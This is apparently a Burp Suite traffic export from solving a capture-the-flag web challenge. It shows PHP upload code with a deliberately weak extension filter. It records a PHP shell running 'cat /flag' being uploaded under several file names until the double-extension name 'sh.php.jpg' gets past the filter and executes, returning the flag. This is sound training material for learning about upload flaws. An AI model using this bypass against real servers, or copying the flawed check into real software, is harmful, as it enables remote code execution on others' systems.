<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Mon Dec 17 16:52:33 CST 2018">
  <item>
    <time>Mon Dec 17 16:49:38 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4006/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4006</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 140.110.112.32:4006
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>5165</responselength>
    <mimetype>text</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 08:49:38 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4971
Connection: close
Content-Type: text/html; charset=UTF-8

<h2>Sh3ll Upload3r</h2>
<form method="post" enctype="multipart/form-data">
  <input type="file" name="my_file">
  <input type="submit" value="Upload">
</form>
<hr>
<br>
You can only upload file with this content:
<pre>
&lt;?php
system(&quot;cat /flag&quot;);
</pre>
<hr>
<br>
<br>
<br>
<h3>Source Code:</h3>
<code><span style="color: #000000">
&lt;h2&gt;Sh3ll&nbsp;Upload3r&lt;/h2&gt;<br />&lt;form&nbsp;method="post"&nbsp;enctype="multipart/form-data"&gt;<br />&nbsp;&nbsp;&lt;input&nbsp;type="file"&nbsp;name="my_file"&gt;<br />&nbsp;&nbsp;&lt;input&nbsp;type="submit"&nbsp;value="Upload"&gt;<br />&lt;/form&gt;<br />&lt;hr&gt;<br />&lt;br&gt;<br />You&nbsp;can&nbsp;only&nbsp;upload&nbsp;file&nbsp;with&nbsp;this&nbsp;content:<br />&lt;pre&gt;<br /><span style="color: #0000BB">&lt;?php&nbsp;</span><span style="color: #007700">echo&nbsp;</span><span style="color: #0000BB">htmlentities</span><span style="color: #007700">(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #DD0000">"sh"</span><span style="color: #007700">));</span><span style="color: #0000BB">?&gt;<br /></span>&lt;/pre&gt;<br />&lt;hr&gt;<br />&lt;br&gt;<br />&lt;br&gt;<br />&lt;br&gt;<br />&lt;h3&gt;Source&nbsp;Code:&lt;/h3&gt;<br /><span style="color: #0000BB">&lt;?php<br />$file&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'tmp_name'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">$dest&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'upload/'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">$extension&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">],</span><span style="color: #0000BB">PATHINFO_EXTENSION</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">$h&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sha1</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)));<br /><br />if(</span><span style="color: #0000BB">stripos</span><span style="color: #007700">(</span><span style="color: #0000BB">$extension</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'h'</span><span style="color: #007700">)&nbsp;!==&nbsp;</span><span style="color: #0000BB">FALSE</span><span style="color: #007700">)&nbsp;die(</span><span style="color: #DD0000">'Bad&nbsp;Hacker!'</span><span style="color: #007700">);<br /><br /></span><span style="color: #FF8000">//&nbsp;check&nbsp;content<br /></span><span style="color: #007700">if(</span><span style="color: #0000BB">$h&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #DD0000">"9b651c5246040f7b776a8a81badf24382c4e1860"</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #DD0000">"&lt;h3&nbsp;style='color:red'&gt;OK,&nbsp;your&nbsp;shell&nbsp;is&nbsp;valid&lt;/h3&gt;"</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">move_uploaded_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$dest</span><span style="color: #007700">);<br />}&nbsp;else&nbsp;if(</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">!==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(</span><span style="color: #DD0000">"Oops!&nbsp;You&nbsp;can&nbsp;only&nbsp;upload&nbsp;my&nbsp;shell&nbsp;:)"</span><span style="color: #007700">);<br />}<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?&gt;<br /></span>
</span>
</code>]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 16:50:13 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4006/sh]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4006</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/sh]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /sh HTTP/1.1
Host: 140.110.112.32:4006
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
If-None-Match: "c9de3-1b-56cda5ee09480"
If-Modified-Since: Wed, 23 May 2018 07:20:34 GMT
Connection: close

]]></request>
    <status>304</status>
    <responselength>149</responselength>
    <mimetype></mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 304 Not Modified
Date: Mon, 17 Dec 2018 08:50:14 GMT
Server: Apache/2.2.15 (CentOS)
Connection: close
ETag: "c9de3-1b-56cda5ee09480"

]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 16:50:29 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4006/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4006</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST / HTTP/1.1
Host: 140.110.112.32:4006
Content-Length: 210
Cache-Control: max-age=0
Origin: http://140.110.112.32:4006
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxCgqSuErcJl0pv9B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:4006/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryxCgqSuErcJl0pv9B
Content-Disposition: form-data; name="my_file"; filename="sh.txt"
Content-Type: text/plain

<?php
system("cat /flag");

------WebKitFormBoundaryxCgqSuErcJl0pv9B--
]]></request>
    <status>200</status>
    <responselength>5215</responselength>
    <mimetype>text</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 08:50:29 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5021
Connection: close
Content-Type: text/html; charset=UTF-8

<h2>Sh3ll Upload3r</h2>
<form method="post" enctype="multipart/form-data">
  <input type="file" name="my_file">
  <input type="submit" value="Upload">
</form>
<hr>
<br>
You can only upload file with this content:
<pre>
&lt;?php
system(&quot;cat /flag&quot;);
</pre>
<hr>
<br>
<br>
<br>
<h3>Source Code:</h3>
<h3 style='color:red'>OK, your shell is valid</h3><code><span style="color: #000000">
&lt;h2&gt;Sh3ll&nbsp;Upload3r&lt;/h2&gt;<br />&lt;form&nbsp;method="post"&nbsp;enctype="multipart/form-data"&gt;<br />&nbsp;&nbsp;&lt;input&nbsp;type="file"&nbsp;name="my_file"&gt;<br />&nbsp;&nbsp;&lt;input&nbsp;type="submit"&nbsp;value="Upload"&gt;<br />&lt;/form&gt;<br />&lt;hr&gt;<br />&lt;br&gt;<br />You&nbsp;can&nbsp;only&nbsp;upload&nbsp;file&nbsp;with&nbsp;this&nbsp;content:<br />&lt;pre&gt;<br /><span style="color: #0000BB">&lt;?php&nbsp;</span><span style="color: #007700">echo&nbsp;</span><span style="color: #0000BB">htmlentities</span><span style="color: #007700">(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #DD0000">"sh"</span><span style="color: #007700">));</span><span style="color: #0000BB">?&gt;<br /></span>&lt;/pre&gt;<br />&lt;hr&gt;<br />&lt;br&gt;<br />&lt;br&gt;<br />&lt;br&gt;<br />&lt;h3&gt;Source&nbsp;Code:&lt;/h3&gt;<br /><span style="color: #0000BB">&lt;?php<br />$file&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'tmp_name'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">$dest&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'upload/'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">$extension&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">],</span><span style="color: #0000BB">PATHINFO_EXTENSION</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">$h&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sha1</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)));<br /><br />if(</span><span style="color: #0000BB">stripos</span><span style="color: #007700">(</span><span style="color: #0000BB">$extension</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'h'</span><span style="color: #007700">)&nbsp;!==&nbsp;</span><span style="color: #0000BB">FALSE</span><span style="color: #007700">)&nbsp;die(</span><span style="color: #DD0000">'Bad&nbsp;Hacker!'</span><span style="color: #007700">);<br /><br /></span><span style="color: #FF8000">//&nbsp;check&nbsp;content<br /></span><span style="color: #007700">if(</span><span style="color: #0000BB">$h&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #DD0000">"9b651c5246040f7b776a8a81badf24382c4e1860"</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #DD0000">"&lt;h3&nbsp;style='color:red'&gt;OK,&nbsp;your&nbsp;shell&nbsp;is&nbsp;valid&lt;/h3&gt;"</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">move_uploaded_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$dest</span><span style="color: #007700">);<br />}&nbsp;else&nbsp;if(</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">!==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(</span><span style="color: #DD0000">"Oops!&nbsp;You&nbsp;can&nbsp;only&nbsp;upload&nbsp;my&nbsp;shell&nbsp;:)"</span><span style="color: #007700">);<br />}<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?&gt;<br /></span>
</span>
</code>]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 16:51:06 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4006/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4006</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST / HTTP/1.1
Host: 140.110.112.32:4006
Content-Length: 210
Cache-Control: max-age=0
Origin: http://140.110.112.32:4006
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxCgqSuErcJl0pv9B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:4006/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryxCgqSuErcJl0pv9B
Content-Disposition: form-data; name="my_file"; filename="sh.php"
Content-Type: text/plain

<?php
system("cat /flag");

------WebKitFormBoundaryxCgqSuErcJl0pv9B--
]]></request>
    <status>200</status>
    <responselength>512</responselength>
    <mimetype>text</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 08:51:06 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 319
Connection: close
Content-Type: text/html; charset=UTF-8

<h2>Sh3ll Upload3r</h2>
<form method="post" enctype="multipart/form-data">
  <input type="file" name="my_file">
  <input type="submit" value="Upload">
</form>
<hr>
<br>
You can only upload file with this content:
<pre>
&lt;?php
system(&quot;cat /flag&quot;);
</pre>
<hr>
<br>
<br>
<br>
<h3>Source Code:</h3>
Bad Hacker!]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 16:51:38 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4006/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4006</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST / HTTP/1.1
Host: 140.110.112.32:4006
Content-Length: 214
Cache-Control: max-age=0
Origin: http://140.110.112.32:4006
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxCgqSuErcJl0pv9B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:4006/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryxCgqSuErcJl0pv9B
Content-Disposition: form-data; name="my_file"; filename="sh.php.jpg"
Content-Type: text/plain

<?php
system("cat /flag");

------WebKitFormBoundaryxCgqSuErcJl0pv9B--
]]></request>
    <status>200</status>
    <responselength>5215</responselength>
    <mimetype>text</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 08:51:39 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5021
Connection: close
Content-Type: text/html; charset=UTF-8

<h2>Sh3ll Upload3r</h2>
<form method="post" enctype="multipart/form-data">
  <input type="file" name="my_file">
  <input type="submit" value="Upload">
</form>
<hr>
<br>
You can only upload file with this content:
<pre>
&lt;?php
system(&quot;cat /flag&quot;);
</pre>
<hr>
<br>
<br>
<br>
<h3>Source Code:</h3>
<h3 style='color:red'>OK, your shell is valid</h3><code><span style="color: #000000">
&lt;h2&gt;Sh3ll&nbsp;Upload3r&lt;/h2&gt;<br />&lt;form&nbsp;method="post"&nbsp;enctype="multipart/form-data"&gt;<br />&nbsp;&nbsp;&lt;input&nbsp;type="file"&nbsp;name="my_file"&gt;<br />&nbsp;&nbsp;&lt;input&nbsp;type="submit"&nbsp;value="Upload"&gt;<br />&lt;/form&gt;<br />&lt;hr&gt;<br />&lt;br&gt;<br />You&nbsp;can&nbsp;only&nbsp;upload&nbsp;file&nbsp;with&nbsp;this&nbsp;content:<br />&lt;pre&gt;<br /><span style="color: #0000BB">&lt;?php&nbsp;</span><span style="color: #007700">echo&nbsp;</span><span style="color: #0000BB">htmlentities</span><span style="color: #007700">(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #DD0000">"sh"</span><span style="color: #007700">));</span><span style="color: #0000BB">?&gt;<br /></span>&lt;/pre&gt;<br />&lt;hr&gt;<br />&lt;br&gt;<br />&lt;br&gt;<br />&lt;br&gt;<br />&lt;h3&gt;Source&nbsp;Code:&lt;/h3&gt;<br /><span style="color: #0000BB">&lt;?php<br />$file&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'tmp_name'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">$dest&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'upload/'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">$extension&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'my_file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">],</span><span style="color: #0000BB">PATHINFO_EXTENSION</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">$h&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sha1</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)));<br /><br />if(</span><span style="color: #0000BB">stripos</span><span style="color: #007700">(</span><span style="color: #0000BB">$extension</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'h'</span><span style="color: #007700">)&nbsp;!==&nbsp;</span><span style="color: #0000BB">FALSE</span><span style="color: #007700">)&nbsp;die(</span><span style="color: #DD0000">'Bad&nbsp;Hacker!'</span><span style="color: #007700">);<br /><br /></span><span style="color: #FF8000">//&nbsp;check&nbsp;content<br /></span><span style="color: #007700">if(</span><span style="color: #0000BB">$h&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #DD0000">"9b651c5246040f7b776a8a81badf24382c4e1860"</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #DD0000">"&lt;h3&nbsp;style='color:red'&gt;OK,&nbsp;your&nbsp;shell&nbsp;is&nbsp;valid&lt;/h3&gt;"</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">move_uploaded_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$dest</span><span style="color: #007700">);<br />}&nbsp;else&nbsp;if(</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">!==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(</span><span style="color: #DD0000">"Oops!&nbsp;You&nbsp;can&nbsp;only&nbsp;upload&nbsp;my&nbsp;shell&nbsp;:)"</span><span style="color: #007700">);<br />}<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?&gt;<br /></span>
</span>
</code>]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Mon Dec 17 16:51:47 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4006/upload/sh.php.jpg]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4006</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/upload/sh.php.jpg]]></path>
    <extension>jpg</extension>
    <request base64="false"><![CDATA[GET /upload/sh.php.jpg HTTP/1.1
Host: 140.110.112.32:4006
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>225</responselength>
    <mimetype>CSS</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 08:51:47 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 33
Connection: close
Content-Type: text/html; charset=UTF-8

FLAG{simple_upload_practice_lol}
]]></response>
    <comment></comment>
  </item>
</items>
